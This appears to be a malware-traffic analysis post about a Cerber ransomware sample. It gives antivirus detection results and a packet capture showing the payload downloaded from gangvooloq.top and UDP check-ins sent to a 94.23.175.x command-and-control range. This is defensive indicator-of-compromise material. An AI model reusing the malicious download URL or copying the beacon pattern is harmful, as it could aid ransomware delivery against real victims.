RANSOMWARE CERBER gangvooloq.top GET /admin.php?f=1.exe Malware Traffic PCAP File Download 94.23.175 UDP/6893

 

SHA256: 0f24c298bf3be1e2ef6c56763e4fadc22270a90df18ceb78024bb82a49b0bd41
File name: 1.exe
Detection ratio: 16 / 59
Analysis date: 2017-05-09 01:04:23 UTC ( 0 minutes ago )
AegisLab Ml.Attribute.Gen!c 20170508
Avast Win32:Malware-gen 20170509
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9999 20170503
CrowdStrike Falcon (ML) malicious_confidence_100% (W) 20170130
Cyren W32/Cerber.F.gen!Eldorado 20170509
Endgame malicious (high confidence) 20170503
F-Prot W32/Cerber.F.gen!Eldorado 20170508
Invincea trojanspy.win32.ursnif.hn 20170413
Kaspersky UDS:DangerousObject.Multi.Generic 20170508
McAfee Trojan-FKQC!F33AD873ED2E 20170508
McAfee-GW-Edition BehavesLike.Win32.Generic.hm 20170508
Palo Alto Networks (Known Signatures) generic.ml 20170509
SentinelOne (Static ML) static engine – malicious 20170330
Symantec Trojan.Gen.8!cloud 20170508
Webroot W32.Trojan.Gen 20170509
ZoneAlarm by Check Point UDS:DangerousObject.Multi.Generic 20170509

2017-05-08 19:58:00.607221 IP 192.168.1.102.54567 > 47.91.76.69.80: Flags [P.], seq 0:405, ack 1, win 256, length 405: HTTP: GET /admin.php?f=1.exe HTTP/1.1
E…p4@…KX…f/[LE.’.P.@..x]iqP…i…GET /admin.php?f=1.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: gangvooloq.top
Connection: Keep-Alive

 

2017-05-08 19:58:24.046363 IP 192.168.1.102.56465 > 94.23.175.35.6893: UDP, length 14
E..*……^….f^..#……
.72aabb4d96c2bf….
2017-05-08 19:58:24.046474 IP 192.168.1.102.56465 > 94.23.175.36.6893: UDP, length 14
E..* w….L….f^..$……
.72aabb4d96c2bf….
2017-05-08 19:58:24.046673 IP 192.168.1.102.56465 > 94.23.175.37.6893: UDP, length 14
E..*’r….E….f^..%……
.72aabb4d96c2bf….
2017-05-08 19:58:24.046755 IP 192.168.1.102.56465 > 94.23.175.38.6893: UDP, length 14
E..*e……u…f^..&……
.72aabb4d96c2bf….
2017-05-08 19:58:24.046867 IP 192.168.1.102.56465 > 94.23.175.39.6893: UDP, length 14
E..*k……….f^..’……
.72aabb4d96c2bf….
2017-05-08 19:58:24.046948 IP 192.168.1.102.56465 > 94.23.175.40.6893: UDP, length 14
E..*1_….;….f^..(……
.72aabb4d96c2bf….
2017-05-08 19:58:24.047079 IP 192.168.1.102.56465 > 94.23.175.41.6893: UDP, length 14
E..*:R….2″…f^..)……
.72aabb4d96c2bf….
2017-05-08 19:58:24.047150 IP 192.168.1.102.56465 > 94.23.175.42.6893: UDP, length 14
E..*u……….f^..*……
.72aabb4d96c2bf….
2017-05-08 19:58:24.047262 IP 192.168.1.102.56465 > 94.23.175.43.6893: UDP, length 14
E..*~……….f^..+……
.72aabb4d96c2bf….
2017-05-08 19:58:24.047339 IP 192.168.1.102.56465 > 94.23.175.44.6893: UDP, length 14
E..*……\….f^..,……
.72aabb4d96c2bf….
2017-05-08 19:58:24.047454 IP 192.168.1.102.56465 > 94.23.175.45.6893: UDP, length 14
E..*……S….f^..-……
.72aabb4d96c2bf….
2017-05-08 19:58:24.047530 IP 192.168.1.102.56465 > 94.23.175.46.6893: UDP, length 14
E..*T-…..B…f^………
.72aabb4d96c2bf….
2017-05-08 19:58:24.047639 IP 192.168.1.102.56465 > 94.23.175.47.6893: UDP, length 14
E..*]……^…f^../……
.72aabb4d96c2bf….